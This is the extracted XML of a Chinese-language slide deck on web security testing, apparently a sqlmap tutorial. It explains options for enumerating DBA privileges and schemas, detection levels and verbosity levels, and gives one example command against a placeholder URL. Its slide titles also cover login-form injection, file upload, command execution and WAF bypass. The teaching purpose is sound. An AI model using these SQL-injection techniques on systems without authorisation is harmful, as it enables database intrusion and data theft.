                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>列出数据库管理员角色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--privileges 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>列出数据库管理员权限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列举数据库系统的架构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sqlmap.py -u "http://xx.com/int.php?id=1" --schema --batch --exclude-sysdbs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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探测等级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60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
            </a:pP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参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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en-US" altLang="zh-CN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共有五个等级，默认为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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xml/payloads.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中看到，你也可以根据相应的格式添加自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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这个参数不仅影响使用哪些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>同时也会影响测试的注入点，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GET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的数据都会测试，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP Cookie</a:t>
            </a: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level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的时候就会测试，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP User-Agent/Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>头在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>level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的时候就会测试。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zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>总之在你不确定哪个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或者参数为注入点的时候，为了保证全面性，建议使用高的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>值。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US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显示调试信息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60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-v  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>显示调试信息 有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个级别</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1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endParaRPr lang="zh-CN" altLang="en-US" b="1" kern="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/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、只显示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错误以及严重的信息。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、同时显示基本信息和警告信息。（默认）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、同时显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>信息。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、同时显示注入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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、同时显示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请求。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、同时显示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响应头。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
            </a:pP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、同时显示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响应页面。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A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8271</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>463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Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>方正综艺简体</vt:lpstr>
      <vt:lpstr>Levenim MT</vt:lpstr>
      <vt:lpstr>Yu Gothic UI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SQLMAP介绍</vt:lpstr>
      <vt:lpstr>sqlmap安装</vt:lpstr>
      <vt:lpstr>基本参数</vt:lpstr>
      <vt:lpstr>基本参数</vt:lpstr>
      <vt:lpstr>基本参数</vt:lpstr>
      <vt:lpstr>探测等级</vt:lpstr>
      <vt:lpstr>显示调试信息</vt:lpstr>
      <vt:lpstr>风险等级</vt:lpstr>
      <vt:lpstr>获取目标</vt:lpstr>
      <vt:lpstr>获取目标</vt:lpstr>
      <vt:lpstr>获取http请求注入</vt:lpstr>
      <vt:lpstr>处理Google搜索结果</vt:lpstr>
      <vt:lpstr>--data</vt:lpstr>
      <vt:lpstr>--param-del</vt:lpstr>
      <vt:lpstr>--cookie</vt:lpstr>
      <vt:lpstr>--referer,--headers,--proxy</vt:lpstr>
      <vt:lpstr>时间控制</vt:lpstr>
      <vt:lpstr>--safe-url,--safe-freq</vt:lpstr>
      <vt:lpstr>-p</vt:lpstr>
      <vt:lpstr>--prefix,--suffix</vt:lpstr>
      <vt:lpstr>--technique</vt:lpstr>
      <vt:lpstr>--union-cols</vt:lpstr>
      <vt:lpstr>--second-order</vt:lpstr>
      <vt:lpstr>--dump-all,--exclude-sysdbs</vt:lpstr>
      <vt:lpstr>--search,-C,-T,-D</vt:lpstr>
      <vt:lpstr>--udf-inject,--shared-lib</vt:lpstr>
      <vt:lpstr>-s,-t</vt:lpstr>
      <vt:lpstr>--batch</vt:lpstr>
      <vt:lpstr>--flush-session</vt:lpstr>
      <vt:lpstr>--output-dir</vt:lpstr>
      <vt:lpstr>--smart,--mobile</vt:lpstr>
      <vt:lpstr>--identify-waf,--check-waf</vt:lpstr>
      <vt:lpstr>注册表操作</vt:lpstr>
      <vt:lpstr>暴力破解表名</vt:lpstr>
      <vt:lpstr>暴力破解列名</vt:lpstr>
      <vt:lpstr>POST登录框注入</vt:lpstr>
      <vt:lpstr>搜索框注入</vt:lpstr>
      <vt:lpstr>伪静态注入</vt:lpstr>
      <vt:lpstr>base64编码注入</vt:lpstr>
      <vt:lpstr>请求时间延迟</vt:lpstr>
      <vt:lpstr>执行sql语句</vt:lpstr>
      <vt:lpstr>文件读写</vt:lpstr>
      <vt:lpstr>文件上传</vt:lpstr>
      <vt:lpstr>命令执行</vt:lpstr>
      <vt:lpstr>WAF绕过注入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WEB安全测试</dc:title>
  <dc:creator>admin</dc:creator>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-23T15:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-26T15:13:54Z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